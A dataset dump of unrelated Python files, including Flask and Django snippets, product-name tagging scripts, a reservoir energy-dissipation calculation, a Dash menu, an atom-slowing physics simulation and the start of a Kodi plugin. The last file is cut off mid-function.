text stringlengths 8 6.05M |
|---|
from blog import create_app

# Development entry point: build the Flask app and serve it directly.
if __name__ == '__main__':
    application = create_app()
    # NOTE: debug mode on a publicly bound port is for development only.
    application.run(host="0.0.0.0", port=80, debug=True)
import os
# {{product_name:浙江在线杭州}}
# if __name__ == '__main__':
# path = './data.txt'
# save_path = './spu_name_origindata.txt'
def clear_and_format_data1(data_name, save_path):
    """Tag the label substring inside each product name with {{spu_name:...}}.

    Input file format (tab separated), e.g.::

        舒洁双层抽取纸4包装	纸
        舒洁精品3层卷筒卫生纸260节*10	卫生纸

    For every line whose label occurs inside the product name, each
    occurrence of the label is wrapped as ``{{spu_name:label}}``; otherwise
    the bare product name is written out.  Results are written to
    ``<save_path>/spu_name_origindata.txt``.

    :param data_name: path of the tab-separated input file
    :param save_path: directory that receives spu_name_origindata.txt
    """
    # Use context managers so both handles are closed even on error
    # (the previous version never closed the output file).
    with open(data_name, 'r', encoding='utf-8') as f:
        data_ = f.readlines()
    with open(os.path.join(save_path, 'spu_name_origindata.txt'), 'w', encoding='utf-8') as f_save:
        for line in data_:
            # Strip newline, spaces and any pre-existing braces, then split on tab.
            each_data = line.replace('\n', '').replace(' ', '').replace('{', '').replace('}', '').split('\t')
            print(each_data)
            if len(each_data) == 2 and each_data[1] in each_data[0]:
                # Wrap every occurrence of the label inside the product name.
                str_temp = each_data[0].replace(each_data[1], '{{spu_name:%s}}' % each_data[1])
                f_save.write(str_temp + '\n')
                print(str_temp)
            else:
                f_save.write(each_data[0] + '\n')
def clear_and_format_data2(data_name, save_path):
    """Tag the label substring for 3-column (name, category, label) data.

    Input file format (tab separated), e.g.::

        舒洁双层抽取纸4包装	xxxx	纸
        清风原木纯品面纸3包装	xxxx	面纸

    Three-column rows join the first two fields with a comma and wrap the
    label as ``{{spu_name:label}}``; two-column rows fall back to the same
    handling as :func:`clear_and_format_data1`; anything else is written
    through untagged.  Results go to ``<save_path>/spu_name_origindata.txt``.

    :param data_name: path of the tab-separated input file
    :param save_path: directory that receives spu_name_origindata.txt
    """
    # Context managers guarantee the handles are closed (the previous
    # version leaked the output file).
    with open(data_name, 'r', encoding='utf-8') as f:
        data_ = f.readlines()
    with open(os.path.join(save_path, 'spu_name_origindata.txt'), 'w', encoding='utf-8') as f_save:
        for line in data_:
            each_data = line.replace('\n', '').replace(' ', '').replace('{', '').replace('}', '').split('\t')
            if len(each_data) == 3 and each_data[2] in ','.join(each_data[:2]):
                # Label found in "name,category": tag every occurrence.
                str_temp = ','.join(each_data[:2]).replace(each_data[2], '{{spu_name:%s}}' % each_data[2])
                f_save.write(str_temp + '\n')
            elif len(each_data) == 2 and each_data[1] in each_data[0]:
                # Two-column fallback, same as clear_and_format_data1.
                str_temp = each_data[0].replace(each_data[1], '{{spu_name:%s}}' % each_data[1])
                f_save.write(str_temp + '\n')
            else:
                f_save.write(each_data[0] + '\n')
|
from django.contrib.auth import forms
from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth.models import User
from django.forms import ModelForm
from django import forms
from users.models import CustomUser
from .models import NomeraKlassa
from .models import Predmety
from .models import Prepodavately
from .models import Uroki, NomeraUroka, NomeraKlassa, Predmety, Prepodavately
class UserCreateForm(UserCreationForm):
    """Registration form for CustomUser that also collects a class number."""
    # Extra field on top of the standard UserCreationForm fields.
    klass_nomer = forms.IntegerField(required=True)

    class Meta:
        model = CustomUser
        # NOTE(review): the form exposes "klass" but save() stores
        # "klass_nomer" — confirm both fields exist on CustomUser and that
        # omitting "username" here is intentional.
        fields = ( "password1", "password2", "klass", "email")

    def save(self, commit=True):
        """Attach the cleaned class number to the user before saving."""
        user = super(UserCreateForm, self).save(commit=False)
        user.klass_nomer = self.cleaned_data["klass_nomer"]
        if commit:
            user.save()
        return user
class UrokiForm(ModelForm):
    """ModelForm exposing the editable fields of a lesson (Uroki)."""
    class Meta:
        model = Uroki
        # Explicit field list: date, lesson number, class number, start time,
        # subject, teacher, topic, lesson link, access code, comments.
        fields = ['date_field', 'nomer_uroka', 'nomer_klassa', 'vremya_nachala_uroka', 'nazvanie_predmeta', 'prepodavatel', 'tema_uroka', 'ssylka_na_urok', 'kod_dostupa', 'kommentaryi']
|
import rips
import time
import grpc
import math
from operator import itemgetter
from ecl.eclfile import EclFile
from ecl.grid import EclGrid
# Connect to ResInsight
resinsight = rips.Instance.find()
start = time.time()
# NOTE(review): only the first case in the project is processed.
case = resinsight.project.cases()[0]
num_tsteps = len(case.time_steps())
name = case.name
grids = case.grids()
# NOTE(review): this loop overwrites Nx/Ny/Nz each iteration, so only the
# dimensions of the *last* grid survive — confirm a single-grid model.
for grid in grids:
    dimension = grid.dimensions()
    Nx = dimension.i
    Ny = dimension.j
    Nz = dimension.k
# Read output files (Eclipse EGRID/INIT named after the case)
egrid_file = EclFile("%s.EGRID" % name)
init_file = EclFile("%s.INIT" % name)
egrid = EclGrid("%s.EGRID" % name)
# Read ACTNUM numbers from EGRID file
actnum = egrid_file["ACTNUM"][0]
# Collect indices of active cells (ACTNUM == 1); stored 1-based (i+1).
active_cells = []
for i in range(len(actnum)):
    if actnum[i] == 1:
        active_cells.append(i+1)
num_active_cells = len(active_cells)
# Read NNC pairs from EGRID and INIT file
# (cell pair from NNC1/NNC2 plus its transmissibility from TRANNNC)
nnc_list = []
if egrid_file.has_kw("NNC1"):
    nnc1 = egrid_file["NNC1"][0]
    nnc2 = egrid_file["NNC2"][0]
    tran = init_file["TRANNNC"][0]
    for g1,g2,t in zip(nnc1,nnc2,tran):
        nnc_list.append((g1,g2,t))
# Calculation of energy dissipation for each cell
total_ed = 0.0
# NOTE(review): hard-coded start at timestep 219 — looks like the restart of
# a partial run; confirm before reusing this script.
for tstep in range(219,num_tsteps):
    print("Timestep", tstep, "of", num_tsteps)
    # Read results into list
    # NOTE(review): the STATIC_NATIVE properties do not change over time but
    # are re-fetched every timestep; hoisting them above the loop would save
    # repeated round-trips.
    tranx_results = case.active_cell_property('STATIC_NATIVE', 'TRANX', 0)
    trany_results = case.active_cell_property('STATIC_NATIVE', 'TRANY', 0)
    tranz_results = case.active_cell_property('STATIC_NATIVE', 'TRANZ', 0)
    multx_results = case.active_cell_property('STATIC_NATIVE', 'MULTX', 0)
    multy_results = case.active_cell_property('STATIC_NATIVE', 'MULTY', 0)
    multz_results = case.active_cell_property('STATIC_NATIVE', 'MULTZ', 0)
    pres_results = case.active_cell_property('DYNAMIC_NATIVE', 'PRESSURE', tstep)
    krw_results = case.active_cell_property('DYNAMIC_NATIVE', 'WATKR', tstep)
    kro_results = case.active_cell_property('DYNAMIC_NATIVE', 'OILKR', tstep)
    krg_results = case.active_cell_property('DYNAMIC_NATIVE', 'GASKR', tstep)
    muw_results = case.active_cell_property('DYNAMIC_NATIVE', 'WAT_VISC', tstep)
    muo_results = case.active_cell_property('DYNAMIC_NATIVE', 'OIL_VISC', tstep)
    mug_results = case.active_cell_property('DYNAMIC_NATIVE', 'GAS_VISC', tstep)
    # Determination of upstream/downstream cells in each direction
    prevx_pres_results = [0.0] * num_active_cells
    nextx_pres_results = [0.0] * num_active_cells
    prevy_pres_results = [0.0] * num_active_cells
    nexty_pres_results = [0.0] * num_active_cells
    prevz_pres_results = [0.0] * num_active_cells
    nextz_pres_results = [0.0] * num_active_cells
    # NOTE(review): `idx in active_cells` and active_cells.index(...) are O(n)
    # list scans inside an O(n) loop; a dict {cell_index: position} built once
    # outside the timestep loop would make this pass linear.
    for c in range(num_active_cells):
        print("pres calculation: checking cell", c+1, "of", num_active_cells, end="\r")
        idx = active_cells[c]
        plane_num = idx%(Nx*Ny)              # position within the current layer
        layer_num = math.floor(idx/(Nx*Ny))  # layer (K) number
        # -X / +X neighbours; the modulo guards stop wrap-around across rows
        if idx-1 in active_cells and idx%Nx != 0:
            prevx_pres_results[c] = pres_results[active_cells.index(idx-1)]
        if idx+1 in active_cells and (idx+1)%Nx != 0:
            nextx_pres_results[c] = pres_results[active_cells.index(idx+1)]
        # -Y / +Y neighbours; zeroed again when the neighbour falls outside the layer
        if idx-Nx in active_cells:
            prevy_pres_results[c] = pres_results[active_cells.index(idx-Nx)]
        if plane_num < Nx:
            prevy_pres_results[c] = 0.0
        if idx+Nx in active_cells:
            nexty_pres_results[c] = pres_results[active_cells.index(idx+Nx)]
        if plane_num+Nx >= (Nx*Ny):
            nexty_pres_results[c] = 0.0
        # -Z / +Z neighbours; zeroed on the top/bottom layers
        if idx-(Nx*Ny) in active_cells:
            prevz_pres_results[c] = pres_results[active_cells.index(idx-Nx*Ny)]
        if layer_num == 0:
            prevz_pres_results[c] = 0.0
        if idx+(Nx*Ny) in active_cells:
            nextz_pres_results[c] = pres_results[active_cells.index(idx+Nx*Ny)]
        if layer_num == Nz-1:
            nextz_pres_results[c] = 0.0
    print(end='\r')
    # Calculate interblock flowrates in + direction(s)
    flow_x_results = []
    flow_y_results = []
    flow_z_results = []
    zip_results_f = list(zip(tranx_results, trany_results, tranz_results, multx_results, multy_results, multz_results, pres_results, prevx_pres_results, nextx_pres_results, prevy_pres_results, nexty_pres_results, prevz_pres_results, nextz_pres_results, krw_results, kro_results, krg_results, muw_results, muo_results, mug_results))
    for (tranx, trany, tranz, multx, multy, multz, pres, prevx_pres, nextx_pres, prevy_pres, nexty_pres, prevz_pres, nextz_pres, krw, kro, krg, muw, muo, mug) in zip_results_f:
        # Rate = transmissibility * multiplier * total (3-phase) mobility * dP;
        # a zero neighbour pressure marks "no neighbour" and gives zero flow.
        if nextx_pres > 0.0 and tranx > 0.0:
            flow_x = tranx * multx * ((krw/muw)+(kro/muo)+(krg/mug)) * (pres-nextx_pres)
        else:
            flow_x = 0.0
        if nexty_pres > 0.0 and trany > 0.0:
            flow_y = trany * multy * ((krw/muw)+(kro/muo)+(krg/mug)) * (pres-nexty_pres)
        else:
            flow_y = 0.0
        if nextz_pres > 0.0 and tranz > 0.0:
            flow_z = tranz * multz * ((krw/muw)+(kro/muo)+(krg/mug)) * (pres-nextz_pres)
        else:
            flow_z = 0.0
        flow_x_results.append(flow_x)
        flow_y_results.append(flow_y)
        flow_z_results.append(flow_z)
    # Determination of downstream flowrates in each direction
    prevx_flow_results = [0.0] * num_active_cells
    prevy_flow_results = [0.0] * num_active_cells
    prevz_flow_results = [0.0] * num_active_cells
    for c in range(num_active_cells):
        print("flow calculation: checking cell", c+1, "of", num_active_cells, end="\r")
        idx = active_cells[c]
        plane_num = idx%(Nx*Ny)
        layer_num = math.floor(idx/(Nx*Ny))
        if idx-1 in active_cells and idx%Nx != 0:
            prevx_flow_results[c] = flow_x_results[active_cells.index(idx-1)]
        if idx-Nx in active_cells:
            prevy_flow_results[c] = flow_y_results[active_cells.index(idx-Nx)]
        if plane_num < Nx:
            prevy_flow_results[c] = 0.0
        if idx-(Nx*Ny) in active_cells:
            prevz_flow_results[c] = flow_z_results[active_cells.index(idx-Nx*Ny)]
        if layer_num == 0:
            prevz_flow_results[c] = 0.0
    print(end='\r')
    # Generate energy change lists as results
    e_dis = []
    e_int = []
    # 1: Calculate energy changes in reservoir
    zip_results_e = list(zip(pres_results, prevx_pres_results, nextx_pres_results, prevy_pres_results, nexty_pres_results, prevz_pres_results, nextz_pres_results, flow_x_results, flow_y_results, flow_z_results, prevx_flow_results, prevy_flow_results, prevz_flow_results))
    for (pres, prevx_pres, nextx_pres, prevy_pres, nexty_pres, prevz_pres, nextz_pres, flow_x, flow_y, flow_z, prevx_flow, prevy_flow, prevz_flow) in zip_results_e:
        # dissipation = flow * pressure drop; internal = pressure * net inflow
        ed_x = flow_x * (pres - nextx_pres)
        ed_y = flow_y * (pres - nexty_pres)
        ed_z = flow_z * (pres - nextz_pres)
        ei_x = pres * (prevx_flow - flow_x)
        ei_y = pres * (prevy_flow - flow_y)
        ei_z = pres * (prevz_flow - flow_z)
        e_dis.append((ed_x + ed_y + ed_z) * (1e5/86400)) # Convert unit to J/s
        e_int.append((ei_x + ei_y + ei_z) * (1e5/86400))
    #2: Calculate energy changes from flow between NNC pairs
    for n in range(len(nnc_list)):
        print("Checking NNC", n+1, "of", len(nnc_list), end="\r")
        orig = active_cells.index(nnc_list[n][0])
        dest = active_cells.index(nnc_list[n][1])
        param1 = zip_results_f[orig]
        param2 = zip_results_f[dest]
        tran = nnc_list[n][2]
        # Indices 13-18 are krw,kro,krg,muw,muo,mug and 6 is PRESSURE in zip_results_f.
        flow_nnc = tran * ((param1[13]/param1[16])+(param1[14]/param1[17])+(param1[15]/param1[18])) * (param1[6]-param2[6])
        ed_nnc = flow_nnc * (param1[6]-param2[6]) * (1e5/86400)
        ei_nnc_1 = -param1[6] * flow_nnc * (1e5/86400)
        ei_nnc_2 = param2[6] * flow_nnc * (1e5/86400)
        e_dis[orig] += ed_nnc
        e_int[orig] += ei_nnc_1
        e_int[dest] += ei_nnc_2
    print("Total energy dissipation:",sum(e_dis),"J/s")
    print("Total internal energy change:",sum(e_int),"J/s")
    try:
        # Send back output result
        case.set_active_cell_property(e_dis, 'GENERATED', 'Energy Dissipation', tstep)
        case.set_active_cell_property(e_int, 'GENERATED', 'Internal Energy Change', tstep)
    except grpc.RpcError as e:
        print("Exception Received: ", e)
end = time.time()
print("Time elapsed: ", end - start)
print("Transferred all results back\n")
# Display the generated result in the first view.
view = case.views()[0].apply_cell_result('GENERATED', 'Energy Dissipation')
import dash_bootstrap_components as dbc
from dash import html
# Example DropdownMenu: headers, items in various states, dividers,
# and a trailing paragraph of arbitrary non-item content.
menu_children = [
    dbc.DropdownMenuItem("Header", header=True),
    dbc.DropdownMenuItem("An item"),
    dbc.DropdownMenuItem(divider=True),
    dbc.DropdownMenuItem("Active and disabled", header=True),
    dbc.DropdownMenuItem("Active item", active=True),
    dbc.DropdownMenuItem("Disabled item", disabled=True),
    dbc.DropdownMenuItem(divider=True),
    html.P(
        "You can have other content here like text if you like.",
        className="text-muted px-4 mt-4",
    ),
]
dropdown = dbc.DropdownMenu(menu_children, label="Menu")
|
import numpy as np
import scipy.stats as sts
import matplotlib.pyplot as plt
import scipy.constants as sc
import scipy.special as scp
import timeit
start = timeit.default_timer()
G = 38.11e6       # See ln 96 (Gamma, spontaneous-emission rate)
E0 = 150          # electric field amplitude used for the Rabi frequency below
Da = 4.0*G        # Original detuning
d = 0.3*G         # Increment of Detuning
aa = 0.15         # Coil Radius
s = 0.11          # Coil Separation
Curr = 0.6805     # Current (16G/cm @ 0.6805)
z0 = 0.24         # Position of MOT centre
h = 0.00005       # Step Size (integrator time step)
Natoms = 20       # number of simulated atoms
Nsteps = 200      # RK4 steps per atom
# Seven laser detunings spaced d apart, starting from Da.
Db,Dc,Dd,De,Df,Dg = Da+d, Da+2*d, Da+3*d, Da+4*d, Da+5*d, Da+6*d
# Positions used to plot the magnetic-field profile (avoids exactly 0).
xx = np.linspace(0.000001, 1, 100)
def Jgen(T,n,M):
    ''' Maxwell-Boltzmann Distrb.

    Draw n speeds for an atom of mass M.
    NOTE(review): the passed-in temperature T is immediately overwritten
    with 293 K below — confirm whether the argument should be honoured.
    '''
    T = 273+20
    boltzmann = 1.38e-23
    scale = abs(np.sqrt((boltzmann*T)/(M)))
    # random_state=None -> a fresh, non-deterministic draw on every call
    return sts.maxwell.rvs(loc=0, scale=scale, size=n, random_state=None)
Vn = 50   # lower bound of the linear initial-velocity distribution (presumably m/s)
Vx = 320  # upper bound of the linear initial-velocity distribution (presumably m/s)
def vgen(n):
    ''' Linear Velocity Distrb.

    Return n speeds evenly spaced between the globals Vn and Vx.
    '''
    return np.linspace(Vn, Vx, n)
def zgen(n):
    ''' Linear Coordinate Distrb.

    Return n starting coordinates, all at the origin (z = 0).
    '''
    return np.linspace(0, 0, n)
def MagLeak(z, z0, Curr):
    '''Mag Field from AntiHlmHltz coils (of center z0 [ >0 ]) that leaks into our slower'''
    # Off-axis radial field of the two coils via complete elliptic integrals.
    # Globals: aa = coil radius, s = coil separation. Contributions from the
    # two (opposed) coils are computed separately and summed.
    x = s/2
    ZZ = -z+z0   # axial distance to one coil
    zz = -ZZ     # and to its mirror partner
    A,B = ZZ/aa, x/aa
    Q = B**2+(1+A)**2
    k = (4*A/Q)**0.5
    B0 = Curr*sc.mu_0/(2*aa)
    K = scp.ellipk(k**2)
    E = scp.ellipe(k**2)
    Br = 2*B0*(x/ZZ)/(np.pi*Q**0.5)*(E*(1+A**2+B**2)/(Q-4*A)-K)
    # nan_to_num guards the on-axis singularity where ZZ -> 0 divides by zero.
    Bro = np.nan_to_num(Br)
    #'''''
    # Second (opposed) coil: same expression with the sign of the axial
    # distance flipped and the field negated.
    A_ = zz/aa
    Q_ = B**2+(1+A_)**2
    k_ = (4*A_/Q_)**0.5
    K_ = scp.ellipk(k_**2)
    E_ = scp.ellipe(k_**2)
    Br_ = -2*B0*(x/zz)/(np.pi*Q_**0.5)*(E_*(1+A_**2+B**2)/(Q_-4*A_)-K_)
    Br_o = np.nan_to_num(Br_)
    return Br_o + Bro
def RK4step(ti,zi,vi,h,dv,dz):
    """Advance (z, v) by one classical 4th-order Runge-Kutta step of size h.

    dz(t, z, v) and dv(t, z, v) are the time derivatives of z and v.
    Returns the updated (z, v) pair.
    """
    half = h/2
    kz1 = dz(ti, zi, vi)
    kv1 = dv(ti, zi, vi)
    kz2 = dz(ti+half, zi+half*kz1, vi+half*kv1)
    kv2 = dv(ti+half, zi+half*kz1, vi+half*kv1)
    kz3 = dz(ti+half, zi+half*kz2, vi+half*kv2)
    kv3 = dv(ti+half, zi+half*kz2, vi+half*kv2)
    kz4 = dz(ti+h, zi+h*kz3, vi+h*kv3)
    kv4 = dv(ti+h, zi+h*kz3, vi+h*kv3)
    z_next = zi+(h/6.0)*(kz1+2.0*kz2+2.0*kz3+kz4)
    v_next = vi+(h/6.0)*(kv1+2.0*kv2+2.0*kv3+kv4)
    return z_next, v_next
""" Physical & Atomic Constants """
kb = sc.Boltzmann # Boltzmann Constant
mu0 = sc.mu_0 # Vacc Permtivity
muB = 9.2740099*10**-24 # Borh Magnetron
u = sc.proton_mass # Proton Mass
hbar = sc.hbar # hbar
c = sc.c # speed of light
pi = np.pi # pi
M = 87*u # Mass of 87Rb
wab = 2*pi*384.23e12 # Freq of transation
#G = 38.11e6 # Gamma / Rate of SpE
dip = 3.485e-29 # dipole moment
''' Variable Dance '''
Rabi = dip*E0/hbar # Rabi Frequency
IoIs = 2*Rabi**2/G**2 # Intensity / Saturation Intensity
IrE = c*8.85e-12/2*E0**2/10000 # Intensity (This /10000 makes it W/cm^2)
w = wab - Dd # Average Freq of colliding photon
Lambda = 2*pi*c/w # Avg Wavelength
k = 2*pi/Lambda # Average wavenumber of a momentum transfering photon
def dv(t,z,v):
    " The 'complete' Force Equation for a 7 freq 1 dimensional slower inc. magnetic field "
    # Laser frequencies for the seven detunings.
    w_a = wab - Da
    w_b = wab - Db
    w_c = wab - Dc
    w_d = wab - Dd
    w_e = wab - De
    w_f = wab - Df
    w_g = wab - Dg
    # Per-frequency terms combining the optical frequency with the local
    # Zeeman shift from the leaked MOT field.
    Oa = w_a/(2*pi*c)-muB*MagLeak(z, z0, Curr)/hbar
    Ob = w_b/(2*pi*c)-muB*MagLeak(z, z0, Curr)/hbar
    Oc = w_c/(2*pi*c)-muB*MagLeak(z, z0, Curr)/hbar
    Od = w_d/(2*pi*c)-muB*MagLeak(z, z0, Curr)/hbar
    Oe = w_e/(2*pi*c)-muB*MagLeak(z, z0, Curr)/hbar
    Of = w_f/(2*pi*c)-muB*MagLeak(z, z0, Curr)/hbar
    Og = w_g/(2*pi*c)-muB*MagLeak(z, z0, Curr)/hbar
    # Lorentzian denominator coefficients (1/(c1 -/+ c2*v + c3*v^2)) for
    # each frequency; c1 = saturation term, c2 = Doppler cross term,
    # c3 = quadratic Doppler term.
    c1a = 1+IoIs+4*Da**2/G**2
    c2a = Oa*8*Da/G**2
    c1b = 1+IoIs+4*Db**2/G**2
    c2b = Ob*8*Db/G**2
    c1c = 1+IoIs+4*Dc**2/G**2
    c2c = Oc*8*Dc/G**2
    c1d = 1+IoIs+4*Dd**2/G**2
    c2d = Od*8*Dd/G**2
    c1e = 1+IoIs+4*De**2/G**2
    c2e = Oe*8*De/G**2
    c1f = 1+IoIs+4*Df**2/G**2
    c2f = Of*8*Df/G**2
    c1g = 1+IoIs+4*Dg**2/G**2
    c2g = Og*8*Dg/G**2
    c3a = 4*Oa**2/G**2
    c3b = 4*Ob**2/G**2
    c3c = 4*Oc**2/G**2
    c3d = 4*Od**2/G**2
    c3e = 4*Oe**2/G**2
    c3f = 4*Of**2/G**2
    c3g = 4*Og**2/G**2
    # Excited-state population from the counter-propagating (slowing) beams.
    rhoaa = -(IoIs/2)*(1/(c1a-c2a*v+c3a*v**2)+1/(c1b-c2b*v+c3b*v**2)+1/(c1c-c2c*v+c3c*v**2)+1/(c1d-c2d*v+c3d*v**2)+1/(c1e-c2e*v+c3e*v**2)+1/(c1f-c2f*v+c3f*v**2)+1/(c1g-c2g*v+c3g*v**2))
    # NOTE(review): only the first two of the seven frequencies contribute to
    # the backwards beam — the rest are commented out; confirm intentional.
    rhoaaB = (IoIs/2)*(1/(c1a+c2a*v+c3a*v**2)+1/(c1b+c2b*v+c3b*v**2))#+1/(c1c+c2c*v+c3c*v**2)+1/(c1d+c2d*v+c3d*v**2)+1/(c1e+c2e*v+c3e*v**2)+1/(c1f+c2f*v+c3f*v**2)+1/(c1g+c2g*v+c3g*v**2))
    # Net scattering force -> acceleration (hbar*k photon momentum * rate / mass).
    return (rhoaa+rhoaaB)*hbar*k*G/M
def dz(t,z,v):
    # dz/dt = v: the trivial kinematic relation used by the RK4 stepper.
    return v
plt.close('all')
# Figure layout: ax1 (v vs t) and ax2 (z vs t) share a time axis on the left;
# ax3 (phase portrait) sits above ax4 (magnetic field profile) on the right.
fig = plt.figure()
ax1 = plt.subplot2grid((4,3), (0,0), rowspan=2)
ax2 = plt.subplot2grid((4,3), (2,0), rowspan=2, sharex=ax1)
ax3 = plt.subplot2grid((4,3), (0,1), rowspan=3, colspan=2)
ax4 = plt.subplot2grid((4,3), (3,1), rowspan=1, colspan=2, sharex=ax3)
"""creation of our array of velocities"""
#vlin=Jgen(T,Natoms,M)
vlin=vgen(Natoms)
zlin=zgen(Natoms)
zs,vs,ts=[],[],[]
"""this loop goes through all the atoms we've got and applies the force dv to them for a number of steps, Nsteps"""
for j in range(Natoms):
    vi = vlin[j]
    zi = zlin[j]
    for i in range(Nsteps):
        ti=h*i
        zs.append(zi)
        vs.append(vi)
        ts.append(ti)
        # NOTE(review): RK4step is evaluated twice per step (once per returned
        # component); a single call unpacked as (z1, v1) would halve the work.
        z1=RK4step(ti,zi,vi,h,dv,dz)[0]
        v1=RK4step(ti,zi,vi,h,dv,dz)[1]
        zi = z1
        vi = v1
# Reshape the flat trajectory lists into one row per atom.
V = np.reshape(vs, (Natoms,Nsteps))
Z = np.reshape(zs, (Natoms,Nsteps))
tt = np.array(ts)
thet = np.split(tt, Natoms)[1]   # one atom's time axis (identical for all atoms)
for i in range(Natoms):
    'A plot for each of the Natoms particles'
    th = 0.35
    # Colour ramp so individual atoms are distinguishable.
    col = (float(i/(Natoms+1)+0.0001), np.square(1-float(i/(Natoms+1)+0.0001)), np.sqrt(1-float(i/(Natoms+1)+0.0001)))
    ax1.plot(thet,V[i],linewidth=th, color = col)
    ax2.plot(thet,Z[i],linewidth=th, color = col)
    ax3.plot(Z[i],V[i],linewidth=th, color = col)
# Shaded capture-velocity bands plus axis limits and reference lines.
capV, capv = 50,15
ax1.axhspan(-capV,capV, alpha=0.05, color='b')
ax1.axhspan(-capv,capv, alpha=0.05, color='red')
ax1.set_ylim(top=Vx+5, bottom=-capV)
ax1.set_xlim(left=0, right=0.003)
ax2.hlines(z0, 0, h*Nsteps, linestyles='dashed')     # MOT centre
ax2.hlines(z0-aa, 0, h*Nsteps, linestyles='dotted')  # one coil radius before it
ax2.set_xlim(left=0, right=0.003)
ax2.set_ylim(top=2*aa, bottom=-0.005)
ax3.axhspan(-capV,capV, alpha=0.05, color='b')
ax3.axhspan(-capv,capv, alpha=0.05, color='red')
ax3.axvline(x = z0 - aa, color = 'k', linestyle='dotted')
ax3.axvline(x = z0, color = 'k', linestyle='dashed')
ax3.set_xlim(left=-0.009, right=z0+1.1*aa)
ax3.set_ylim(top=Vx+2, bottom=-30)
ax4.axvline(x = z0 - aa, color = 'k', linestyle='dotted')
ax4.axvline(x = z0, color = 'k', linestyle='dashed')
# Magnetic-field profile in mT along the slower axis.
ax4.fill_between(xx, 0, MagLeak(xx, z0, Curr)*1000, color='k', alpha=0.1)
ax4.plot(xx, MagLeak(xx, z0, Curr)*1000, color='gray')
fig.subplots_adjust(hspace=0) # Makes the plots that share the
# # same x axis on top of each other
ax1.set_ylabel("Velocity / ms`'", size = 13)
ax2.set_ylabel('Coordinate / m', size = 13)
ax2.set_xlabel('Time / s', size = 13)
ax3.set_ylabel("Velocity / ms`'", size = 15)
#ax3.set_title('Multi-Frequency Slowing Simulation: $\it{7}$ $\it{Frequencies}$, $\it{MOT}$ $\it{Magnetic}$ $\it{Field}$', size=17)
ax3.set_title('Multi-Frequency Slowing Simulation: 7 Frequencies, with some backwards and MOT Magnetic Field', size=17)
ax4.set_xlabel('Distance / m (0 = atom source)', size = 20)
ax4.set_ylabel('Magnetic Field Strength / mT')
'''Slope Finding'''
# Estimate the field gradient around the MOT centre from the two endpoints
# of a short sampled line.
LenLin,dd = 1000, 0.03
LinGrad = np.linspace(z0-dd, z0+dd, LenLin)
Bp = MagLeak(LinGrad,z0,Curr)[0]
Bm = MagLeak(LinGrad,z0,Curr)[LenLin-1]
ax4.plot(LinGrad, MagLeak(LinGrad, z0, Curr)*1000, color='cyan', lw=0.5)
Grad = abs(Bp-Bm)/(2*dd)
from datetime import date
today = date.today()
d4 = today.strftime("%d-%b-%Y")
#print("d4 =", d4)
#ax3.legend(title=' {}\nIntensity = {}W/cm2\nDetuning = {} w/ Increment {}MHz\nE0 = {} no. atoms = {} \nLength of Tube = {}cm\nMag Field Gradient = {}G/cm'.format(d4,round(IrE, 3),Da/1000000,d/1000000,E0,nj, round((z0-aa)*100,3),round(Grad*1000000,2), loc=2, prop={'size': 18}))
# Annotation summarising the run parameters, placed on the phase portrait.
textstr = ' {}\nIntensity = {}mW/cm2\nDetuning = {} w/ Increment {}MHz\nE0 = {} no. atoms = {} \nLength of Tube = {}cm\nMag Field Gradient = {}G/cm'.format(d4,round(IrE*1000, 3),Da/1000000,d/1000000,E0,Natoms, round((z0-aa)*100,3),round(Grad*1000000,2))
ax3.text(z0+0.01, 250, textstr, fontsize=16)
stop = timeit.default_timer()
print('# Particles = {}'.format(Natoms))
print('Beam Intensity = {}W/cm^2'.format(round(IrE, 3)))
print('Run Time =',round(stop - start, 3),'sec')
plt.show()
|
a=input("Write a: ")
are=(int(a)**2)
print("Are S :")
print(are) |
# -*- coding: utf-8 -*-
"""Main plugin file - Handles the various routes"""
__author__ = "fraser"
import logging
import routing
import xbmc
import xbmcaddon
import xbmcplugin
from xbmcgui import ListItem
from resources.lib import kodilogging
from resources.lib import kodiutils as ku
from resources.lib import search as nfpfs
kodilogging.config()                 # route python logging into the Kodi log
logger = logging.getLogger(__name__)
plugin = routing.Plugin()            # URL router for this add-on
ADDON_NAME = xbmcaddon.Addon().getAddonInfo("name")  # National Film Preservation
def parse_search_results(json, query):
    # type: (dict, str) -> None
    """Parses search results"""
    # NOTE: *json* shadows the stdlib module name; kept for interface stability.
    for video in json.get("videos"):
        for key in video:
            item = video.get(key)
            if not item:
                continue
            elif isinstance(item, list):
                item = " ".join(item)   # flatten list fields for the substring test
            elif isinstance(item, int):
                item = str(item)        # compare numeric fields as text
            if query in item:  # simple text search on each field
                add_menu_item(play_film,
                              video.get("name"),
                              args={"href": video.get("path")},
                              art=ku.art(nfpfs.get_url(video.get("image_path"))),
                              info={
                                  "mediatype": "video",
                                  "plot": nfpfs.text_to_soup(video.get("notes")).find("p").text,
                                  "genre": video.get("archive_names"),
                                  "year": video.get("sort_year")
                              },
                              directory=False)
                break  # only one match per-video
def paginate(category, href, page):
    # type: (str, str, int) -> None
    """Adds pagination to results pages"""
    next_page = page + 1
    # "[Next page N]" folder item that re-enters section() with an offset.
    add_menu_item(section,
                  "[{} {}]".format(ku.localize(32011), next_page),
                  args={
                      "href": href,
                      "page": next_page,
                      "offset": page * nfpfs.SEARCH_MAX_RESULTS,
                      "category": category
                  })
def add_menu_item(method, label, **kwargs):
    # type: (callable, Union[str, int], Any) -> None
    """wrapper for xbmcplugin.addDirectoryItem

    method: the @plugin.route handler the item links to.
    label: display text, or an int localisation id.
    kwargs: args (route query args), art, info, directory (default True).
    """
    args = kwargs.get("args", {})
    label = ku.localize(label) if isinstance(label, int) else label
    list_item = ListItem(label)
    list_item.setArt(kwargs.get("art"))
    # Saved-search items get a context-menu entry to delete themselves.
    if method == search and "q" in args:
        list_item.addContextMenuItems([(
            ku.localize(32019),
            "XBMC.RunPlugin({})".format(plugin.url_for(search, delete=True, q=label))
        )])
    if method == section or method == play_film:
        list_item.setInfo("video", kwargs.get("info"))
    if method == play_film:
        # Marks the item resolvable via setResolvedUrl in play_film().
        list_item.setProperty("IsPlayable", "true")
    xbmcplugin.addDirectoryItem(
        plugin.handle,
        plugin.url_for(method, **args),
        list_item,
        kwargs.get("directory", True))
def get_arg(key, default=None):
    # type: (str, Any) -> Any
    """Get the argument value or default"""
    # Route args arrive as lists; fall back to "" when no default is given.
    fallback = "" if default is None else default
    values = plugin.args.get(key, [fallback])
    return values[0]
def parse_mercury(soup):
    # type: (BeautifulSoup) -> None
    """Parses the mercury theater items (odd mark-up)"""
    for image in soup.select("a > img"):
        # The anchor wrapping the thumbnail carries the film href.
        action = image.find_previous("a")
